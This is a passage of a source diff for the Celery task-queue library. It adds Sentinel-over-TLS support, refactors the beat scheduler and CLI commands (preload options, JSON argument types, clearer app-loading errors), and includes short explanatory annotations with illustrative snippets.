+ """Connect to a Redis server using Sentinel + TLS.
+
+ Use Sentinel to identify which Redis server is the current master
+ to connect to, and use an SSL connection when connecting to it.
+ """
+
+
class SentinelBackend(RedisBackend):
"""Redis sentinel task result store."""
+ # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3`
+ _SERVER_URI_SEPARATOR = ";"
+
sentinel = getattr(redis, "sentinel", None)
+ connection_class_ssl = SentinelManagedSSLConnection if sentinel else None
def __init__(self, *args, **kwargs):
if self.sentinel is None:
@@ -519,9 +599,28 @@ def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
+ def as_uri(self, include_password=False):
+ """Return the server addresses as URIs, sanitizing the password or not."""
+ # Allow superclass to do work if we don't need to force sanitization
+ if include_password:
+ return super().as_uri(
+ include_password=include_password,
+ )
+ # Otherwise we need to ensure that all components get sanitized by
+ # passing them one by one to the `kombu` helper
+ uri_chunks = (
+ maybe_sanitize_url(chunk)
+ for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR)
+ )
+ # Similar to the superclass, strip the trailing slash from URIs with
+ # all components empty other than the scheme
+ return self._SERVER_URI_SEPARATOR.join(
+ uri[:-1] if uri.endswith(":///") else uri
+ for uri in uri_chunks
+ )
+
def _params_from_url(self, url, defaults):
- # URL looks like sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3.
- chunks = url.split(";")
+ chunks = url.split(self._SERVER_URI_SEPARATOR)
connparams = dict(defaults, hosts=[])
for chunk in chunks:
data = super()._params_from_url(
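The chord bookkeeping above hinges on three per-group Redis keys. A minimal illustrative sketch (not part of the patch) of how they cooperate, assuming `backend` is a configured RedisBackend and `gid` is the group id of a chord header:

# Illustrative only: key names follow the '.j'/'.t'/'.s' suffixes used above.
skey = backend.get_key_for_group(gid, '.s')  # expected chord size
jkey = backend.get_key_for_group(gid, '.j')  # results collected so far
tkey = backend.get_key_for_group(gid, '.t')  # running adjustment to the total

backend.set_chord_size(gid, 3)  # written once when the chord header is applied
# Each `on_chord_part_return()` call pushes one encoded result onto `jkey`;
# the body is dispatched once the collected count equals
# int(skey) + int(tkey or 0), and all three keys are deleted in the
# `finally` block above.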
diff --git a/celery/backends/rpc.py b/celery/backends/rpc.py
index 9b851db4de8..399c1dc7a20 100644
--- a/celery/backends/rpc.py
+++ b/celery/backends/rpc.py
@@ -338,5 +338,5 @@ def binding(self):
@cached_property
def oid(self):
- # cached here is the app OID: name of queue we receive results on.
- return self.app.oid
+ # cached here is the app thread OID: name of queue we receive results on.
+ return self.app.thread_oid
diff --git a/celery/backends/s3.py b/celery/backends/s3.py
index c102073ccca..ea04ae373d1 100644
--- a/celery/backends/s3.py
+++ b/celery/backends/s3.py
@@ -72,6 +72,7 @@ def set(self, key, value):
s3_object.put(Body=value)
def delete(self, key):
+ key = bytes_to_str(key)
s3_object = self._get_s3_object(key)
s3_object.delete()
diff --git a/celery/beat.py b/celery/beat.py
index 3e1d31a59ac..d8a4fc9e8b2 100644
--- a/celery/beat.py
+++ b/celery/beat.py
@@ -203,6 +203,24 @@ def __ne__(self, other):
return not self == other
+def _evaluate_entry_args(entry_args):
+ if not entry_args:
+ return []
+ return [
+ v() if isinstance(v, BeatLazyFunc) else v
+ for v in entry_args
+ ]
+
+
+def _evaluate_entry_kwargs(entry_kwargs):
+ if not entry_kwargs:
+ return {}
+ return {
+ k: v() if isinstance(v, BeatLazyFunc) else v
+ for k, v in entry_kwargs.items()
+ }
+
+
class Scheduler:
"""Scheduler for periodic tasks.
@@ -380,8 +398,8 @@ def apply_async(self, entry, producer=None, advance=True, **kwargs):
task = self.app.tasks.get(entry.task)
try:
- entry_args = [v() if isinstance(v, BeatLazyFunc) else v for v in (entry.args or [])]
- entry_kwargs = {k: v() if isinstance(v, BeatLazyFunc) else v for k, v in entry.kwargs.items()}
+ entry_args = _evaluate_entry_args(entry.args)
+ entry_kwargs = _evaluate_entry_kwargs(entry.kwargs)
if task:
return task.apply_async(entry_args, entry_kwargs,
producer=producer,
@@ -494,7 +512,7 @@ class PersistentScheduler(Scheduler):
def __init__(self, *args, **kwargs):
self.schedule_filename = kwargs.get('schedule_filename')
- Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def _remove_db(self):
for suffix in self.known_suffixes:
@@ -685,7 +703,7 @@ def stop(self):
except NotImplementedError: # pragma: no cover
_Process = None
else:
- class _Process(Process): # noqa
+ class _Process(Process):
def __init__(self, app, **kwargs):
super().__init__()
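The two helpers factored out above evaluate `BeatLazyFunc` wrappers only when the entry is actually sent. A hedged sketch of that behaviour, assuming `BeatLazyFunc` is importable from `celery.beat` as referenced in this module (values are illustrative):

from datetime import datetime

from celery.beat import BeatLazyFunc

entry_kwargs = {'scheduled_for': BeatLazyFunc(datetime.utcnow), 'retries': 3}
evaluated = {
    k: v() if isinstance(v, BeatLazyFunc) else v
    for k, v in entry_kwargs.items()
}
# `scheduled_for` resolves to the datetime at send time;
# plain values such as `retries` pass through unchanged.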
diff --git a/celery/bin/amqp.py b/celery/bin/amqp.py
index e8b7f24066c..d94c91607bd 100644
--- a/celery/bin/amqp.py
+++ b/celery/bin/amqp.py
@@ -8,6 +8,8 @@
__all__ = ('amqp',)
+from celery.bin.base import handle_preload_options
+
def dump_message(message):
if message is None:
@@ -24,6 +26,10 @@ def __init__(self, cli_context):
self.channel = None
self.reconnect()
+ @property
+ def app(self):
+ return self.cli_context.app
+
def respond(self, retval):
if isinstance(retval, str):
self.cli_context.echo(retval)
@@ -54,6 +60,7 @@ def reconnect(self):
@click.group(invoke_without_command=True)
@click.pass_context
+@handle_preload_options
def amqp(ctx):
"""AMQP Administration Shell.
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 9429900a957..30358dd8a9a 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -1,6 +1,8 @@
"""Click customizations for Celery."""
import json
+import numbers
from collections import OrderedDict
+from functools import update_wrapper
from pprint import pformat
import click
@@ -8,6 +10,7 @@
from kombu.utils.objects import cached_property
from celery._state import get_current_app
+from celery.signals import user_preload_options
from celery.utils import text
from celery.utils.log import mlevel
from celery.utils.time import maybe_iso8601
@@ -39,8 +42,7 @@ def __init__(self, app, no_color, workdir, quiet=False):
@cached_property
def OK(self):
- return self.style("OK", fg="green", bold=True) \
-
+ return self.style("OK", fg="green", bold=True)
@cached_property
def ERROR(self):
@@ -72,7 +74,7 @@ def error(self, message=None, **kwargs):
kwargs['color'] = False
click.echo(message, **kwargs)
else:
- click.echo(message, **kwargs)
+ click.secho(message, **kwargs)
def pretty(self, n):
if isinstance(n, list):
@@ -114,13 +116,33 @@ def say_chat(self, direction, title, body='', show_body=False):
self.echo(body)
+def handle_preload_options(f):
+ """Extract preload options and return a wrapped callable."""
+ def caller(ctx, *args, **kwargs):
+ app = ctx.obj.app
+
+ preload_options = [o.name for o in app.user_options.get('preload', [])]
+
+ if preload_options:
+ user_options = {
+ preload_option: kwargs[preload_option]
+ for preload_option in preload_options
+ }
+
+ user_preload_options.send(sender=f, app=app, options=user_options)
+
+ return f(ctx, *args, **kwargs)
+
+ return update_wrapper(caller, f)
+
+
class CeleryOption(click.Option):
"""Customized option for Celery."""
- def get_default(self, ctx):
+ def get_default(self, ctx, *args, **kwargs):
if self.default_value_from_context:
self.default = ctx.obj[self.default_value_from_context]
- return super().get_default(ctx)
+ return super().get_default(ctx, *args, **kwargs)
def __init__(self, *args, **kwargs):
"""Initialize a Celery option."""
@@ -169,20 +191,48 @@ class CommaSeparatedList(ParamType):
name = "comma separated list"
def convert(self, value, param, ctx):
- return set(text.str_to_list(value))
+ return text.str_to_list(value)
-class Json(ParamType):
- """JSON formatted argument."""
+class JsonArray(ParamType):
+ """JSON formatted array argument."""
- name = "json"
+ name = "json array"
def convert(self, value, param, ctx):
+ if isinstance(value, list):
+ return value
+
try:
- return json.loads(value)
+ v = json.loads(value)
except ValueError as e:
self.fail(str(e))
+ if not isinstance(v, list):
+ self.fail(f"{value} was not an array")
+
+ return v
+
+
+class JsonObject(ParamType):
+ """JSON formatted object argument."""
+
+ name = "json object"
+
+ def convert(self, value, param, ctx):
+ if isinstance(value, dict):
+ return value
+
+ try:
+ v = json.loads(value)
+ except ValueError as e:
+ self.fail(str(e))
+
+ if not isinstance(v, dict):
+ self.fail(f"{value} was not an object")
+
+ return v
+
class ISO8601DateTime(ParamType):
"""ISO 8601 Date Time argument."""
@@ -221,11 +271,16 @@ def __init__(self):
super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL'))
def convert(self, value, param, ctx):
+ if isinstance(value, numbers.Integral):
+ return value
+
+ value = value.upper()
value = super().convert(value, param, ctx)
return mlevel(value)
-JSON = Json()
+JSON_ARRAY = JsonArray()
+JSON_OBJECT = JsonObject()
ISO8601 = ISO8601DateTime()
ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat()
LOG_LEVEL = LogLevel()
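Splitting the old `Json` type into `JsonArray` and `JsonObject` means `celery call -a/-k` rejects payloads of the wrong shape instead of accepting any valid JSON. A rough, illustrative equivalent of the array validation (not the actual click plumbing):

import json

def parse_json_array(value):
    # Mirrors JsonArray.convert(): parse, then insist on a list.
    parsed = json.loads(value)
    if not isinstance(parsed, list):
        raise ValueError(f"{value} was not an array")
    return parsed

parse_json_array('[2, 2]')    # -> [2, 2]
parse_json_array('{"x": 1}')  # raises ValueError (convert() would call self.fail)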
diff --git a/celery/bin/beat.py b/celery/bin/beat.py
index 54a74c14c7e..145b44e9720 100644
--- a/celery/bin/beat.py
+++ b/celery/bin/beat.py
@@ -3,7 +3,8 @@
import click
-from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption
+from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
from celery.platforms import detached, maybe_drop_privileges
@@ -43,6 +44,7 @@
help_group="Beat Options",
help="Logging level.")
@click.pass_context
+@handle_preload_options
def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None,
gid=None, umask=None, workdir=None, **kwargs):
"""Start the beat periodic task scheduler."""
diff --git a/celery/bin/call.py b/celery/bin/call.py
index c2744a4cd28..a04651bdd4f 100644
--- a/celery/bin/call.py
+++ b/celery/bin/call.py
@@ -1,22 +1,24 @@
"""The ``celery call`` program used to send tasks from the command-line."""
import click
-from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON, CeleryCommand,
- CeleryOption)
+from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY,
+ JSON_OBJECT, CeleryCommand, CeleryOption,
+ handle_preload_options)
+@click.command(cls=CeleryCommand)
@click.argument('name')
@click.option('-a',
'--args',
cls=CeleryOption,
- type=JSON,
+ type=JSON_ARRAY,
default='[]',
help_group="Calling Options",
help="Positional arguments.")
@click.option('-k',
'--kwargs',
cls=CeleryOption,
- type=JSON,
+ type=JSON_OBJECT,
default='{}',
help_group="Calling Options",
help="Keyword arguments.")
@@ -52,8 +54,8 @@
cls=CeleryOption,
help_group="Routing Options",
help="custom routing key.")
-@click.command(cls=CeleryCommand)
@click.pass_context
+@handle_preload_options
def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key):
"""Call a task by name."""
task_id = ctx.obj.app.send_task(
diff --git a/celery/bin/celery.py b/celery/bin/celery.py
index 4f7c95d065c..c6b862d0f10 100644
--- a/celery/bin/celery.py
+++ b/celery/bin/celery.py
@@ -1,9 +1,14 @@
"""Celery Command Line Interface."""
import os
+import pathlib
+import traceback
import click
+import click.exceptions
from click.types import ParamType
from click_didyoumean import DYMGroup
+from click_plugins import with_plugins
+from pkg_resources import iter_entry_points
from celery import VERSION_BANNER
from celery.app.utils import find_app
@@ -24,6 +29,19 @@
from celery.bin.upgrade import upgrade
from celery.bin.worker import worker
+UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style("""
+Unable to load celery application.
+The module {0} was not found.""", fg='red')
+
+UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style("""
+Unable to load celery application.
+While trying to load the module {0} the following error occurred:
+{1}""", fg='red')
+
+UNABLE_TO_LOAD_APP_APP_MISSING = click.style("""
+Unable to load celery application.
+{0}""")
+
class App(ParamType):
"""Application option."""
@@ -33,13 +51,27 @@ class App(ParamType):
def convert(self, value, param, ctx):
try:
return find_app(value)
- except (ModuleNotFoundError, AttributeError) as e:
- self.fail(str(e))
+ except ModuleNotFoundError as e:
+ if e.name != value:
+ exc = traceback.format_exc()
+ self.fail(
+ UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc)
+ )
+ self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name))
+ except AttributeError as e:
+ attribute_name = e.args[0].capitalize()
+ self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name))
+ except Exception:
+ exc = traceback.format_exc()
+ self.fail(
+ UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc)
+ )
APP = App()
+@with_plugins(iter_entry_points('celery.commands'))
@click.group(cls=DYMGroup, invoke_without_command=True)
@click.option('-A',
'--app',
@@ -66,6 +98,9 @@ def convert(self, value, param, ctx):
help_group="Global Options")
@click.option('--workdir',
cls=CeleryOption,
+ type=pathlib.Path,
+ callback=lambda _, __, wd: os.chdir(wd) if wd else None,
+ is_eager=True,
help_group="Global Options")
@click.option('-C',
'--no-color',
@@ -93,8 +128,6 @@ def celery(ctx, app, broker, result_backend, loader, config, workdir,
click.echo(ctx.get_help())
ctx.exit()
- if workdir:
- os.chdir(workdir)
if loader:
# Default app takes loader from this env (Issue #1066).
os.environ['CELERY_LOADER'] = loader
@@ -104,13 +137,17 @@ def celery(ctx, app, broker, result_backend, loader, config, workdir,
os.environ['CELERY_RESULT_BACKEND'] = result_backend
if config:
os.environ['CELERY_CONFIG_MODULE'] = config
- ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, quiet=quiet)
+ ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir,
+ quiet=quiet)
# User options
worker.params.extend(ctx.obj.app.user_options.get('worker', []))
beat.params.extend(ctx.obj.app.user_options.get('beat', []))
events.params.extend(ctx.obj.app.user_options.get('events', []))
+ for command in celery.commands.values():
+ command.params.extend(ctx.obj.app.user_options.get('preload', []))
+
@celery.command(cls=CeleryCommand)
@click.pass_context
@@ -139,6 +176,32 @@ def report(ctx):
celery.add_command(shell)
celery.add_command(multi)
+# Monkey-patch click to display a custom error
+# when -A or --app are used as sub-command options instead of as options
+# of the global command.
+
+previous_show_implementation = click.exceptions.NoSuchOption.show
+
+WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command:
+celery {info_name} {option_name} celeryapp <...>
+
+The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option:
+celery {option_name} celeryapp {info_name} <...>"""
+
+
+def _show(self, file=None):
+ if self.option_name in ('-A', '--app'):
+ self.ctx.obj.error(
+ WRONG_APP_OPTION_USAGE_MESSAGE.format(
+ option_name=self.option_name,
+ info_name=self.ctx.info_name),
+ fg='red'
+ )
+ previous_show_implementation(self, file=file)
+
+
+click.exceptions.NoSuchOption.show = _show
+
def main() -> int:
"""Start celery umbrella command.
diff --git a/celery/bin/control.py b/celery/bin/control.py
index a48de89ce72..fbd3730c490 100644
--- a/celery/bin/control.py
+++ b/celery/bin/control.py
@@ -4,7 +4,9 @@
import click
from kombu.utils.json import dumps
-from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption
+from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand,
+ CeleryOption, handle_preload_options)
+from celery.exceptions import CeleryCommandException
from celery.platforms import EX_UNAVAILABLE
from celery.utils import text
from celery.worker.control import Panel
@@ -71,6 +73,7 @@ def _compile_arguments(action, args):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def status(ctx, timeout, destination, json, **kwargs):
"""Show list of workers that are online."""
callback = None if json else partial(_say_remote_command_reply, ctx)
@@ -79,8 +82,10 @@ def status(ctx, timeout, destination, json, **kwargs):
callback=callback).ping()
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
@@ -90,7 +95,8 @@ def status(ctx, timeout, destination, json, **kwargs):
nodecount, text.pluralize(nodecount, 'node')))
-@click.command(cls=CeleryCommand)
+@click.command(cls=CeleryCommand,
+ context_settings={'allow_extra_args': True})
@click.argument("action", type=click.Choice([
name for name, info in Panel.meta.items()
if info.type == 'inspect' and info.visible
@@ -115,6 +121,7 @@ def status(ctx, timeout, destination, json, **kwargs):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def inspect(ctx, action, timeout, destination, json, **kwargs):
"""Inspect the worker at runtime.
@@ -122,16 +129,23 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
"""
callback = None if json else partial(_say_remote_command_reply, ctx,
show_reply=True)
- replies = ctx.obj.app.control.inspect(timeout=timeout,
+ arguments = _compile_arguments(action, ctx.args)
+ inspect = ctx.obj.app.control.inspect(timeout=timeout,
destination=destination,
- callback=callback)._request(action)
+ callback=callback)
+ replies = inspect._request(action,
+ **arguments)
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
+ return
+
nodecount = len(replies)
if not ctx.obj.quiet:
ctx.obj.echo('\n{} {} online.'.format(
@@ -164,6 +178,7 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def control(ctx, action, timeout, destination, json):
"""Workers remote control.
@@ -180,8 +195,10 @@ def control(ctx, action, timeout, destination, json):
arguments=arguments)
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
diff --git a/celery/bin/events.py b/celery/bin/events.py
index 0e3bd1a8aea..fa37c8352fc 100644
--- a/celery/bin/events.py
+++ b/celery/bin/events.py
@@ -4,13 +4,14 @@
import click
-from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption
+from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
from celery.platforms import detached, set_process_title, strargv
def _set_process_status(prog, info=''):
prog = '{}:{}'.format('celery events', prog)
- info = '{} {}'.format(info, strargv(sys.argv))
+ info = f'{info} {strargv(sys.argv)}'
return set_process_title(prog, info=info)
@@ -78,6 +79,7 @@ def _run_evtop(app):
help_group="Snapshot",
help="Logging level.")
@click.pass_context
+@handle_preload_options
def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs):
"""Event-stream utilities."""
app = ctx.obj.app
diff --git a/celery/bin/graph.py b/celery/bin/graph.py
index 3013077b4b5..d4d6f16205f 100644
--- a/celery/bin/graph.py
+++ b/celery/bin/graph.py
@@ -4,12 +4,14 @@
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
from celery.utils.graph import DependencyGraph, GraphFormatter
@click.group()
-def graph():
+@click.pass_context
+@handle_preload_options
+def graph(ctx):
"""The ``celery graph`` command."""
@@ -72,7 +74,7 @@ class Thread(Node):
def __init__(self, label, **kwargs):
self.real_label = label
super().__init__(
- label='thr-{}'.format(next(tids)),
+ label=f'thr-{next(tids)}',
pos=0,
)
@@ -139,7 +141,7 @@ def maybe_abbr(l, name, max=Wmax):
size = len(l)
abbr = max and size > max
if 'enumerate' in args:
- l = ['{}{}'.format(name, subscript(i + 1))
+ l = [f'{name}{subscript(i + 1)}'
for i, obj in enumerate(l)]
if abbr:
l = l[0:max - 1] + [l[size - 1]]
diff --git a/celery/bin/list.py b/celery/bin/list.py
index fefc5e73fde..f170e627223 100644
--- a/celery/bin/list.py
+++ b/celery/bin/list.py
@@ -1,11 +1,13 @@
"""The ``celery list bindings`` command, used to inspect queue bindings."""
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
@click.group(name="list")
-def list_():
+@click.pass_context
+@handle_preload_options
+def list_(ctx):
"""Get info from broker.
Note:
diff --git a/celery/bin/logtool.py b/celery/bin/logtool.py
index 07dbffa8767..ae64c3e473f 100644
--- a/celery/bin/logtool.py
+++ b/celery/bin/logtool.py
@@ -5,7 +5,7 @@
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
__all__ = ('logtool',)
@@ -111,7 +111,9 @@ def report(self):
@click.group()
-def logtool():
+@click.pass_context
+@handle_preload_options
+def logtool(ctx):
"""The ``celery logtool`` command."""
diff --git a/celery/bin/migrate.py b/celery/bin/migrate.py
index c5ba9b33c43..febaaaacab2 100644
--- a/celery/bin/migrate.py
+++ b/celery/bin/migrate.py
@@ -2,7 +2,8 @@
import click
from kombu import Connection
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
from celery.contrib.migrate import migrate_tasks
@@ -44,6 +45,7 @@
help_group='Migration Options',
help='Continually migrate tasks until killed.')
@click.pass_context
+@handle_preload_options
def migrate(ctx, source, destination, **kwargs):
"""Migrate tasks from one broker to another.
diff --git a/celery/bin/multi.py b/celery/bin/multi.py
index 3e999ab2ab5..3a9e026b88a 100644
--- a/celery/bin/multi.py
+++ b/celery/bin/multi.py
@@ -67,7 +67,7 @@
$ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data
-Q default -L:4,5 DEBUG
- $ # Additional options are added to each celery worker' comamnd,
+ $ # Additional options are added to each celery worker's command,
$ # but you can also modify the options for ranges of, or specific workers
$ # 3 workers: Two with 3 processes, and one with 10 processes.
@@ -108,7 +108,7 @@
from celery import VERSION_BANNER
from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
from celery.platforms import EX_FAILURE, EX_OK, signals
from celery.utils import term
from celery.utils.text import pluralize
@@ -468,7 +468,13 @@ def DOWN(self):
}
)
@click.pass_context
+@handle_preload_options
def multi(ctx):
"""Start multiple worker instances."""
cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color)
- return cmd.execute_from_commandline([''] + ctx.args)
+ # In 4.x, celery multi ignores the global --app option.
+ # Since in 5.0 the --app option is global only, we
+ # rearrange the arguments so that the MultiTool will parse them correctly.
+ args = sys.argv[1:]
+ args = args[args.index('multi'):] + args[:args.index('multi')]
+ return cmd.execute_from_commandline(args)
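A worked example of the argument rotation above (illustrative; `proj` is a placeholder app name):

argv = ['-A', 'proj', 'multi', 'start', '3', '-l', 'INFO']  # sys.argv[1:]
i = argv.index('multi')
rearranged = argv[i:] + argv[:i]
# -> ['multi', 'start', '3', '-l', 'INFO', '-A', 'proj']
# MultiTool now sees the sub-command first, with the global options trailing it.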
diff --git a/celery/bin/purge.py b/celery/bin/purge.py
index 38245d02ff0..2629ac7eff3 100644
--- a/celery/bin/purge.py
+++ b/celery/bin/purge.py
@@ -1,7 +1,8 @@
"""The ``celery purge`` program, used to delete messages from queues."""
import click
-from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption
+from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand,
+ CeleryOption, handle_preload_options)
from celery.utils import text
@@ -25,6 +26,7 @@
help_group='Purging Options',
help="Comma separated list of queues names not to purge.")
@click.pass_context
+@handle_preload_options
def purge(ctx, force, queues, exclude_queues):
"""Erase all messages from all known task queues.
@@ -32,10 +34,10 @@ def purge(ctx, force, queues, exclude_queues):
There's no undo operation for this command.
"""
- queues = queues or set()
- exclude_queues = exclude_queues or set()
app = ctx.obj.app
- names = (queues or set(app.amqp.queues.keys())) - exclude_queues
+ queues = set(queues or app.amqp.queues.keys())
+ exclude_queues = set(exclude_queues or [])
+ names = queues - exclude_queues
qnum = len(names)
if names:
diff --git a/celery/bin/result.py b/celery/bin/result.py
index d90421c4cde..c126fb588ee 100644
--- a/celery/bin/result.py
+++ b/celery/bin/result.py
@@ -1,7 +1,8 @@
"""The ``celery result`` program, used to inspect task results."""
import click
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
@click.command(cls=CeleryCommand)
@@ -17,6 +18,7 @@
help_group='Result Options',
help="Show traceback instead.")
@click.pass_context
+@handle_preload_options
def result(ctx, task_id, task, traceback):
"""Print the return value for a given task id."""
app = ctx.obj.app
diff --git a/celery/bin/shell.py b/celery/bin/shell.py
index 966773c5d11..378448a24cf 100644
--- a/celery/bin/shell.py
+++ b/celery/bin/shell.py
@@ -6,7 +6,8 @@
import click
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
def _invoke_fallback_shell(locals):
@@ -114,6 +115,7 @@ def _invoke_default_shell(locals):
help_group="Shell Options",
help="Use gevent.")
@click.pass_context
+@handle_preload_options
def shell(ctx, ipython=False, bpython=False,
python=False, without_tasks=False, eventlet=False,
gevent=False):
@@ -130,7 +132,7 @@ def shell(ctx, ipython=False, bpython=False,
import_module('celery.concurrency.eventlet')
if gevent:
import_module('celery.concurrency.gevent')
- import celery.task.base
+ import celery
app = ctx.obj.app
app.loader.import_default_modules()
diff --git a/celery/bin/upgrade.py b/celery/bin/upgrade.py
index 1518297172c..cd9a695b702 100644
--- a/celery/bin/upgrade.py
+++ b/celery/bin/upgrade.py
@@ -5,12 +5,15 @@
import click
from celery.app import defaults
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
from celery.utils.functional import pass1
@click.group()
-def upgrade():
+@click.pass_context
+@handle_preload_options
+def upgrade(ctx):
"""Perform upgrade between versions."""
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 4d4c57aea16..7e0d3247ab5 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -9,8 +9,12 @@
from celery import concurrency
from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL,
- CeleryDaemonCommand, CeleryOption)
-from celery.platforms import EX_FAILURE, detached, maybe_drop_privileges
+ CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
+from celery.concurrency.base import BasePool
+from celery.exceptions import SecurityError
+from celery.platforms import (EX_FAILURE, EX_OK, detached,
+ maybe_drop_privileges)
from celery.utils.log import get_logger
from celery.utils.nodenames import default_nodename, host_format, node_format
@@ -37,13 +41,28 @@ class WorkersPool(click.Choice):
def __init__(self):
"""Initialize the workers pool option with the relevant choices."""
- super().__init__(('prefork', 'eventlet', 'gevent', 'solo'))
+ super().__init__(concurrency.get_available_pool_names())
def convert(self, value, param, ctx):
# Pools like eventlet/gevent needs to patch libs as early
# as possible.
- return concurrency.get_implementation(
- value) or ctx.obj.app.conf.worker_pool
+ if isinstance(value, type) and issubclass(value, BasePool):
+ return value
+
+ value = super().convert(value, param, ctx)
+ worker_pool = ctx.obj.app.conf.worker_pool
+ if value == 'prefork' and worker_pool:
+ # If we got the default pool through the CLI
+ # we need to check if the worker pool was configured.
+ # If the worker pool was configured, we shouldn't use the default.
+ value = concurrency.get_implementation(worker_pool)
+ else:
+ value = concurrency.get_implementation(value)
+
+ if not value:
+ value = concurrency.get_implementation(worker_pool)
+
+ return value
class Hostname(StringParamType):
@@ -93,12 +112,18 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
executable=None, hostname=None):
"""Detach program by argv."""
fake = 1 if C_FAKEFORK else fake
+ # `detached()` will attempt to touch the logfile to confirm that error
+ # messages won't be lost after detaching stdout/err, but this means we need
+ # to pre-format it rather than relying on `setup_logging_subsystem()` like
+ # we can elsewhere.
+ logfile = node_format(logfile, hostname)
with detached(logfile, pidfile, uid, gid, umask, workdir, fake,
after_forkers=False):
try:
if executable is not None:
path = executable
os.execv(path, [path] + argv)
+ return EX_OK
except Exception: # pylint: disable=broad-except
if app is None:
from celery import current_app
@@ -107,7 +132,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'ERROR', logfile, hostname=hostname)
logger.critical("Can't exec %r", ' '.join([path] + argv),
exc_info=True)
- return EX_FAILURE
+ return EX_FAILURE
@click.command(cls=CeleryDaemonCommand,
@@ -131,9 +156,10 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--statedb',
cls=CeleryOption,
type=click.Path(),
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_state_db,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_state_db,
help_group="Worker Options",
- help="Path to the state database. The extension '.db' may be"
+ help="Path to the state database. The extension '.db' may be "
"appended to the filename.")
@click.option('-l',
'--loglevel',
@@ -152,7 +178,8 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
@click.option('--prefetch-multiplier',
type=int,
metavar="",
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
cls=CeleryOption,
help_group="Worker Options",
help="Set custom prefetch multiplier value"
@@ -161,7 +188,8 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--concurrency',
type=int,
metavar="",
